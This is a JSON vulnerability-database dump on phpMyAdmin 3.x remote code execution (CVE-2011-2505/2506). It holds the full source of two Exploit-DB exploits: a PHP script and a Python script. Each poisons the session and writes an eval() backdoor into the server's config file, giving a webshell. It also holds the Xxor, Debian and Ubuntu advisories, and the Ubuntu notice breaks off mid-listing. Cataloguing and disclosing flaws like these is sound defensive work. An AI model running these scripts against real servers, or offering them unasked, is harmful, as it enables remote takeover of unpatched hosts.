{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2011-2505", "2011-2506", "CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-09T00:00:00", "id": "EDB-ID:17514", "href": "https://www.exploit-db.com/exploits/17514", "sourceData": "<?php /*\r\n# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit\r\n# Date: 2011-07-09\r\n# Author: Mango of ha.xxor.se\r\n# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 \r\n# CVE : CVE-2011-2505, CVE-2011-2506\r\n# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt\r\n# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n*/\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>\r\n .\r\n , )\\ .\r\n . ,/) , / ) , )\\\r\n )\\( /)/( (__( /( / ) __ __ ________ __ __\r\n / \\ ( )| |) \\ / | |\\ /| | | | | | | | (__)\r\n( ______ / | |_____( ______ | | \\/ | | __ __ | |__| | ___| | __ ___________ __ __ _____\r\n \\| | \\ \\ | | | |)| | \\ \\ | | | | | | | | | | | | / / | | | | | | | | | | | | | |\r\n | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__|\r\n==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== \r\n phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] []\r\n Remote Code Injection [] [][] [] [] [] [] [] []\r\n http://ha.xxor.se [][] [] [] [] [][] [][] [] [] \r\n\t _ _ ___ __ ____ __ ___ ___ \r\n\t| |-| || _ |\\ /\\ /| _ || ) \r\n\t|_|-|_||_|_|/_._\\/_._\\|___||_|_\\ \r\n ___ ___ ___ _ _ ___ ___ __ __ \r\n ( < | [_ / /| || || )(_)| |\\ | /\r\n >__)|_[_ \\__\\|____||_|_\\|_| |_| |_|\r\n\r\nUse responsibly.\r\n\r\n<?php echo php_sapi_name()!=='cli'?'</pre>':'';\r\n\r\nif(php_sapi_name()==='cli'){\r\n\tif(!isset($argv[1])){\r\n\t\toutput(\" Usage\\n \".$argv[0].\" http://example.com/phpMyAdmin-3.3.9.2\");\r\n\t\tkillme();\r\n\t}\r\n\t$pmaurl = $argv[1];\t\r\n}else{\r\n\t$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';\r\n}\r\n$code = 'foreach($_GET as $k=>$v)if($k===\"eval\")eval($v);';\r\n$cookie = null;\r\n$token = null;\r\nif(!function_exists('curl_init')){\r\n\toutput('[!] Fatal error. Need cURL!');\r\n\tkillme();\r\n}\r\n$ch = curl_init();\r\n$debug = 0;\r\nif(php_sapi_name()!=='cli'){\r\n?>\r\n<form method=post>\r\nURL: <input name=url value=\"<?php echo htmlspecialchars($pmaurl);?>\"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>\r\n<input name=submit type=submit value=\u2665>\r\n</form>\r\n<pre>\r\n<?php\r\nif(!isset($_REQUEST['submit']))killme(true);\r\n}\r\n\r\noutput(\"[i] Running...\");\r\n\r\n// Start a session and get a token\r\ncurl_setopt_array($ch, array(\r\n\tCURLOPT_URL => $pmaurl.'/setup/index.php',\r\n\tCURLOPT_HEADER => 1,\r\n\tCURLOPT_RETURNTRANSFER => 1,\r\n\tCURLOPT_TIMEOUT => 4,\r\n\tCURLOPT_SSL_VERIFYPEER => false,\r\n\tCURLOPT_SSL_VERIFYHOST => false\r\n));\r\noutput(\"[*] Contacting server to retrive session cookie and token.\");\r\n\r\n$result = curl_exec($ch);\r\nif(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){\r\n\toutput(\"[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.\");\r\n\tkillme();\r\n}\r\nif(!$result){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(false !== strpos($result, 'Cannot load or save configuration')){\r\n\toutput(\"[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.\");\r\n\tkillme();\r\n}\r\n\r\n// Extract cookie\r\npreg_match('/phpMyAdmin=([^;]+)/', $result, $matches);\r\n$cookie = $matches[1];\r\noutput(\"[i] Cookie:\".$cookie);\r\n// Extract token\r\npreg_match('/(token=|token\" value=\")([0-9a-f]{32})/', $result, $matches);\r\n$token = $matches[2];\r\noutput(\"[i] Token:\".$token);\r\n\r\n// Poison _SESSION variable\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);\r\ncurl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);\r\noutput(\"[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\n// Save file\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');\r\ncurl_setopt($ch, CURLOPT_POST, 1);\r\ncurl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);\r\noutput(\"[*] Contacting server to make it save the injected code to a file.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\n\r\n//echo htmlspecialchars($result,ENT_QUOTES);\r\n\r\ncurl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');\r\ncurl_setopt($ch, CURLOPT_POST, 0);\r\noutput(\"[*] Contacting server to test if the injected code executes.\");\r\nif(!$result = curl_exec($ch)){\r\n\toutput(\"[!] cURL error:\".curl_error($ch));\r\n\tkillme();\r\n}\r\nif(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){\r\n\toutput(\"[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!\");\r\n\toutput(\"[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';\");\r\n}else{\r\n\toutput(\"[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.\");\r\n}\r\n\r\n\r\ncurl_close($ch);\r\n\r\nfunction output($msg){\r\n\techo php_sapi_name()!=='cli'?htmlspecialchars(\"$msg\\n\",ENT_QUOTES):\"$msg\\n\";\r\n\tflush();\r\n}\r\n\r\nfunction killme(){\r\n\toutput(\"[*] Exiting...\");\r\n\techo php_sapi_name()!=='cli'?'<pre>':'';\r\n\tdie();\r\n}\r\n\r\necho php_sapi_name()!=='cli'?'<pre>':'';?>", "sourceHref": "https://www.exploit-db.com/raw/17514", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:52:57", "description": "", "cvss3": {}, "published": "2011-07-08T00:00:00", "type": "exploitdb", "title": "phpMyAdmin3 (pma3) - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2011-2505", "2011-2506", "CVE-2011-2505", "CVE-2011-2506"], "modified": "2011-07-08T00:00:00", "id": "EDB-ID:17510", "href": "https://www.exploit-db.com/exploits/17510", "sourceData": "#!/usr/bin/env python\r\n# coding=utf-8\r\n# pma3 - phpMyAdmin3 remote code execute exploit\r\n# Author: wofeiwo<wofeiwo@80sec.com>\r\n# Thx Superhei\r\n# Tested on: 3.1.1, 3.2.1, 3.4.3\r\n# CVE: CVE-2011-2505, CVE-2011-2506\r\n# Date: 2011-07-08\r\n# Have fun, DO *NOT* USE IT TO DO BAD THING.\r\n################################################\r\n\r\n# Requirements: 1. \"config\" directory must created&writeable in pma directory.\r\n# 2. session.auto_start = 1 in php.ini configuration.\r\n\r\n\r\nimport os,sys,urllib2,re\r\n\r\ndef usage(program):\r\n print \"PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code\r\nexecute exploit\"\r\n print \"Usage: %s <PMA_url>\" % program\r\n print \"Example: %s http://www.test.com/phpMyAdmin\" % program\r\n sys.exit(0)\r\n\r\ndef main(args):\r\n try:\r\n if len(args) < 2:\r\n usage(args[0])\r\n\r\n if args[1][-1] == \"/\":\r\n args[1] = args[1][:-1]\r\n\r\n # \ufffd\ufffd\u04bb\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u0221token\ufffd\ufffdsessionid\ufffd\ufffdsessionid\ufffd\ufffdphpMyAdmin\ufffd\ufffd\u05b5\ufffd\ufffd\u04bb\ufffd\u00b5\ufffd\r\n print \"[+] Trying get form token&session_id..\"\r\n content = urllib2.urlopen(args[1]+\"/index.php\").read()\r\n r1 = re.findall(\"token=(\\w{32})\", content)\r\n r2 = re.findall(\"phpMyAdmin=(\\w{32,40})\", content)\r\n\r\n if not r1:\r\n r1 = re.findall(\"token\\\" value=\\\"(\\w{32})\\\"\", content)\r\n if not r2:\r\n r2 = re.findall(\"phpMyAdmin\\\" value=\\\"(\\w{32,40})\\\"\", content)\r\n if len(r1) < 1 or len(r2) < 1:\r\n print \"[-] Cannot find form token and session id...exit.\"\r\n sys.exit(-1)\r\n\r\n token = r1[0]\r\n sessionid = r2[0]\r\n print \"[+] Token: %s , SessionID: %s\" % (token, sessionid)\r\n\r\n # \ufffd\u06b6\ufffd\ufffd\ufffd\ufffd\ufffd\u0368\ufffd\ufffdswekey.auth.lib.php\ufffd\ufffd\ufffd\ufffd$_SESSION\ufffd\ufffd\u05b5\r\n print \"[+] Trying to insert payload in $_SESSION..\"\r\n uri = \"/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA\"\r\n url = args[1]+uri\r\n\r\n opener = urllib2.build_opener()\r\n opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;\r\npma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %\r\n(sessionid, sessionid)))\r\n urllib2.install_opener(opener)\r\n urllib2.urlopen(url)\r\n\r\n # \ufffd\ufffd\ufffd\ufffdsetup\ufffd\ufffd\u0221shell\r\n print \"[+] Trying get webshell..\"\r\n postdata =\r\n\"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save\"\r\n% (sessionid, token)\r\n url = args[1]+\"/setup/config.php\"\r\n\r\n # print \"[+]Postdata: %s\" % postdata\r\n urllib2.urlopen(url, postdata)\r\n print \"[+] All done, pray for your lucky!\"\r\n\r\n # \ufffd\ufffd\ufffd\u0132\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdshell\r\n url = args[1]+\"/config/config.inc.php\"\r\n opener.addheaders.append(('Code', 'phpinfo();'))\r\n urllib2.install_opener(opener)\r\n print \"[+] Trying connect shell: %s\" % url\r\n result = re.findall(\"System \\</td\\>\\<td\r\nclass=\\\"v\\\"\\>(.*)\\</td\\>\\</tr\\>\", urllib2.urlopen(url).read())\r\n if len(result) == 1:\r\n print \"[+] Lucky u! System info: %s\" % result[0]\r\n print \"[+] Shellcode is: eval(getenv('HTTP_CODE'));\"\r\n\r\n else:\r\n print \"[-] Cannot get webshell.\"\r\n\r\n except Exception, e:\r\n print e\r\n\r\nif __name__ == \"__main__\" : main(sys.argv)", "sourceHref": "https://www.exploit-db.com/raw/17510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:03", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "cvss3": {}, "published": "2011-07-13T00:00:00", "type": "securityvulns", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-13T00:00:00", "id": "SECURITYVULNS:VULN:11785", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11785", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:08:47", "description": "phar extension information leaks, SPLObjectStorage information leaks, error messages information leaks, variables spoofing.", "cvss3": {}, "published": "2010-09-27T00:00:00", "type": "securityvulns", "title": "PHP multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2950"], "modified": "2010-09-27T00:00:00", "id": "SECURITYVULNS:VULN:11165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11165", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "#######################################################################################\r\n\r\n phpMyAdmin 3.x Multiple Remote Code Executions\r\n\r\n###################################[ Advisory from\r\n]###################################\r\n\r\n¨#########¨¨########¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨##¨¨¨¨¨¨¨¨##########.¨¨¨¨\r\n¨¨¨'####:¨¨¨¨:###'¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨:##:¨¨¨¨¨¨¨¨'###¨¨¨'###.¨¨\r\n¨¨¨¨¨'###.¨¨.##'¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨####¨¨¨¨¨¨¨¨¨###¨¨¨¨¨###¨¨\r\n¨¨¨¨¨¨'###..##'¨¨¨######¨¨#####¨¨.#####.¨¨¨.#¨¨¨___¨¨¨¨¨¨¨¨:#'##:¨¨¨¨¨¨¨¨###¨¨¨¨¨###¨¨\r\n¨¨¨¨¨¨¨'#####'¨¨¨¨¨¨'###:¨¨:##'¨.##''¨''##.####¨######.¨¨¨¨¨#'¨¨##¨¨¨¨¨¨¨¨###¨¨¨¨.###¨¨\r\n¨¨¨¨¨¨¨¨'###:¨¨¨¨¨¨¨¨¨'##..#'¨¨.##'¨¨¨¨¨'##.¨###''¨'##'¨¨¨¨:#¨¨¨##:¨¨¨¨¨¨¨#########:¨¨¨\r\n¨¨¨¨¨¨¨¨.####.¨¨¨¨¨¨¨¨¨'###'¨¨¨###¨¨¨¨¨¨¨###¨##¨¨¨¨¨¨¨¨¨¨¨¨#'¨¨¨:##¨¨¨¨¨¨¨###¨¨¨¨'###.¨\r\n¨¨¨¨¨¨¨.##'###.¨¨¨¨¨¨¨¨¨.##.¨¨¨###¨¨¨¨¨¨¨###¨##¨¨¨¨¨¨¨¨¨¨¨:########:¨¨¨¨¨¨###¨¨¨¨¨'###¨\r\n¨¨¨¨¨¨.##'¨'###.¨¨¨¨¨¨¨.#'##.¨¨###¨¨¨¨¨¨¨###¨##¨¨¨¨¨¨¨¨¨¨¨#'¨¨¨¨¨:##¨¨¨¨¨¨###¨¨¨¨¨¨###¨\r\n¨¨¨¨¨.##'¨¨¨'###.¨¨¨¨¨.#'¨'##.¨'##¨¨¨¨¨¨.##'¨##¨¨¨¨¨¨¨¨¨¨:#¨¨¨¨¨¨¨##:¨¨¨¨¨###¨¨¨¨¨.###¨\r\n¨¨¨.###:¨¨¨¨¨:####.¨.##:¨¨¨:###.'##..¨..##'¨.##¨¨¨¨¨¨¨¨.##.¨¨¨¨¨.###.¨¨¨.###.¨¨¨.###'¨\r\n¨########¨¨¨#############¨#######''#####''¨#######¨¨¨¨#######¨¨¨#######¨###########'¨¨¨\r\n\r\n####################################[ www.Xxor.se\r\n]####################################\r\n\r\nApplication: phpMyAdmin 3.x\r\nPatched ver: 3.3.10.2 and 3.4.3.1\r\nSeverity: High\r\nExploitable: Remote\r\n\r\n#######################################[ Bug 1\r\n]#######################################\r\nA remote variable manipulation vulnerability affecting the superglobal session\r\nvariables that opens up a broad path to other vulnerabilities.\r\n\r\nCVE ID: CVE-2011-2505\r\nPMASA ID: PMASA-2011-5\r\n\r\n#######################################[ Bug 2\r\n]#######################################\r\nA remote attacker in control of the superglobal session variables can inject\r\narbitrary PHP code into a configuration file via an unsanitized key.\r\n\r\nCVE ID: CVE-2011-2506\r\nPMASA ID: PMASA-2011-6\r\n\r\n#######################################[ Bug 3\r\n]#######################################\r\nAn authenticated remote attacker in control of the superglobal session variables\r\ncan inject and execute arbitrary PHP code in PHP function preg_replace.\r\n\r\nCVE ID: CVE-2011-2507\r\nPMASA ID: PMASA-2011-7\r\n\r\n#######################################[ Bug 4\r\n]#######################################\r\nAn authenticated remote attacker can use a directory traversal\r\nvulnerability to include\r\nand execute an arbitrary local file.\r\n\r\nCVE ID: CVE-2011-2508\r\nPMASA ID: PMASA-2011-8\r\n\r\n########################################[ Fix\r\n]########################################\r\n\r\nUpgrade to version 3.3.10.2 or 3.4.3.1.\r\nOr apply patches available at: http://www.phpmyadmin.net/home_page/security/\r\n\r\n#####################################[ Timeline\r\n]######################################\r\n\r\n2011-06-28 - Contacted vendor\r\n2011-06-28 - Vendor responded\r\n2011-06-28 - Sent Details and Suggested Patches to vendor\r\n2011-07-02 - Vulnerabilities fixed\r\n2011-07-07 - Disclosed\r\n\r\n###############################[ Detailed Description\r\n]################################\r\n\r\nhttp://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\r\n\r\n#######################################################################################", "cvss3": {}, "published": "2011-07-13T00:00:00", "type": "securityvulns", "title": "phpMyAdmin 3.x Multiple Remote Code Executions", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-07-13T00:00:00", "id": "SECURITYVULNS:DOC:26645", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26645", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:41", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2286-1 security@debian.org\r\nhttp://www.debian.org/security/ Thijs Kinkhorst\r\nJuly 26, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : phpymadmin\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-2505 CVE-2011-2506 CVE-2011-2507\r\n CVE-2011-2508 CVE-2011-2642\r\n\r\nSeveral vulnerabilities were discovered in phpMyAdmin, a tool to\r\nadministrate MySQL over the web. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2011-2505\r\n\r\n Possible session manipulation in Swekey authentication.\r\n\r\nCVE-2011-2506\r\n\r\n Possible code injection in setup script, in case session\r\n variables are compromised.\r\n\r\nCVE-2011-2507\r\n\r\n Regular expression quoting issue in Synchronize code.\r\n\r\nCVE-2011-2508\r\n\r\n Possible directory traversal in MIME-type transformation.\r\n\r\nCVE-2011-2642\r\n\r\n Cross site scripting in table Print view when the attacker can\r\n create crafted table names.\r\n\r\nNo CVE name yet\r\n\r\n Possible superglobal and local variables manipulation in\r\n Swekey authentication. (PMASA-2011-12)\r\n\r\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\r\nwhich has been fixed in version 2.11.8.1-5+lenny9.\r\n\r\nFor the stable distribution (squeeze), these problems have been fixed\r\nin version 3.3.7-6.\r\n\r\nFor the testing distribution (wheezy) and unstable distribution (sid),\r\nthese problems have been fixed in version 3.4.3.2-1.\r\n\r\nWe recommend that you upgrade your phpymadmin packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJOLxE7AAoJEOxfUAG2iX57N88H/AnM44upqiG3cvo+OYiQq/75\r\nK6dmp4s5hUwJNWYgb3ZlqHw3Cbd/+UMvxztpTMXnDpxddn0PPZR3d55dWSZHYKTf\r\nYdKrAwT7rnkpk6Gc6AOqy96XlxbqiqsRO9VVZCWqfiOSQm6wurzl1eQG8CIeuFg4\r\nPOsQFPo0AOoSMW1C/Lq0y7eArKJT+sjGdI4pdj32e7xJmWXXaU0IjMFIa/kWDo+p\r\n2tbl6lRw262hEEq7immMETxEVoOe173KpYXpMly01tEKQIYepVXmNtDf2w1LgYWd\r\n/LgI837i/5UvGOlxEXSRpTYqShQZ3SWINWdCAxuR8QRdBh3jO+NA6Sr1MNhCX/E=\r\n=MSqd\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-08-01T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 2286-1] phpmyadmin security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26749", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26749", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:36", "description": "===========================================================\r\nUbuntu Security Notice USN-989-1 September 20, 2010\r\nphp5 vulnerabilities\r\nCVE-2010-0397, CVE-2010-1128, CVE-2010-1129, CVE-2010-1130,\r\nCVE-2010-1866, CVE-2010-1868, CVE-2010-1917, CVE-2010-2094,\r\nCVE-2010-2225, CVE-2010-2531, CVE-2010-2950, CVE-2010-3065\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 9.04\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n libapache2-mod-php5 5.1.2-1ubuntu3.19\r\n php5-cgi 5.1.2-1ubuntu3.19\r\n php5-cli 5.1.2-1ubuntu3.19\r\n\r\nUbuntu 8.04 LTS:\r\n libapache2-mod-php5 5.2.4-2ubuntu5.12\r\n php5-cgi 5.2.4-2ubuntu5.12\r\n php5-cli 5.2.4-2ubuntu5.12\r\n\r\nUbuntu 9.04:\r\n libapache2-mod-php5 5.2.6.dfsg.1-3ubuntu4.6\r\n php5-cgi 5.2.6.dfsg.1-3ubuntu4.6\r\n php5-cli 5.2.6.dfsg.1-3ubuntu4.6\r\n\r\nUbuntu 9.10:\r\n libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6.5\r\n php5-cgi 5.2.10.dfsg.1-2ubuntu6.5\r\n php5-cli 5.2.10.dfsg.1-2ubuntu6.5\r\n\r\nUbuntu 10.04 LTS:\r\n libapache2-mod-php5 5.3.2-1ubuntu4.5\r\n php5-cgi 5.3.2-1ubuntu4.5\r\n php5-cli 5.3.2-1ubuntu4.5\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nDetails follow:\r\n\r\nAuke van Slooten discovered that PHP incorrectly handled certain xmlrpc\r\nrequests. An attacker could exploit this issue to cause the PHP server to\r\ncrash, resulting in a denial of service. This issue only affected Ubuntu\r\n6.06 LTS, 8.04 LTS, 9.04 and 9.10. (CVE-2010-0397)\r\n\r\nIt was discovered that the pseudorandom number generator in PHP did not\r\nprovide the expected entropy. An attacker could exploit this issue to\r\npredict values that were intended to be random, such as session cookies.\r\nThis issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.04 and 9.10.\r\n(CVE-2010-1128)\r\n\r\nIt was discovered that PHP did not properly handle directory pathnames that\r\nlacked a trailing slash character. An attacker could exploit this issue to\r\nbypass safe_mode restrictions. This issue only affected Ubuntu 6.06 LTS,\r\n8.04 LTS, 9.04 and 9.10. (CVE-2010-1129)\r\n\r\nGrzegorz Stachowiak discovered that the PHP session extension did not\r\nproperly handle semicolon characters. An attacker could exploit this issue\r\nto bypass safe_mode restrictions. This issue only affected Ubuntu 8.04 LTS,\r\n9.04 and 9.10. (CVE-2010-1130)\r\n\r\nStefan Esser discovered that PHP incorrectly decoded remote HTTP chunked\r\nencoding streams. An attacker could exploit this issue to cause the PHP\r\nserver to crash and possibly execute arbitrary code with application\r\nprivileges. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-1866)\r\n\r\nMateusz Kocielski discovered that certain PHP SQLite functions incorrectly\r\nhandled empty SQL queries. An attacker could exploit this issue to possibly\r\nexecute arbitrary code with application privileges. (CVE-2010-1868)\r\n\r\nMateusz Kocielski discovered that PHP incorrectly handled certain arguments\r\nto the fnmatch function. An attacker could exploit this flaw and cause the\r\nPHP server to consume all available stack memory, resulting in a denial of\r\nservice. (CVE-2010-1917)\r\n\r\nStefan Esser discovered that PHP incorrectly handled certain strings in the\r\nphar extension. An attacker could exploit this flaw to possibly view\r\nsensitive information. This issue only affected Ubuntu 10.04 LTS.\r\n(CVE-2010-2094, CVE-2010-2950)\r\n\r\nStefan Esser discovered that PHP incorrectly handled deserialization of\r\nSPLObjectStorage objects. A remote attacker could exploit this issue to\r\nview sensitive information and possibly execute arbitrary code with\r\napplication privileges. This issue only affected Ubuntu 8.04 LTS, 9.04,\r\n9.10 and 10.04 LTS. (CVE-2010-2225)\r\n\r\nIt was discovered that PHP incorrectly filtered error messages when limits\r\nfor memory, execution time, or recursion were exceeded. A remote attacker\r\ncould exploit this issue to possibly view sensitive information.\r\n(CVE-2010-2531)\r\n\r\nStefan Esser discovered that the PHP session serializer incorrectly handled\r\nthe PS_UNDEF_MARKER marker. An attacker could exploit this issue to alter\r\narbitrary session variables. (CVE-2010-3065)\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19.diff.gz\r\n Size/MD5: 154712 14c7d4eaa9a2c9554cb6d69e675a150c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19.dsc\r\n Size/MD5: 1777 4e521b0cdf30fc3e1b1be7aa51df4b5e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz\r\n Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.19_all.deb\r\n Size/MD5: 301962 3cb291e132c25fc31909b90870d95495\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.19_all.deb\r\n Size/MD5: 1032 867de9a55e534155332eb0b0094c908d\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 2437844 7c64ead91afbb66fc06f2f6088fb58de\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 4761528 26e723dbf705b98fc3fb68bd6fd5df26\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 2393068 15186c32173e5261e9efcbb4b414b8dd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.19_amd64.deb\r\n Size/MD5: 137602 584f45c3add7583046c7b32ff48850d8\r\n 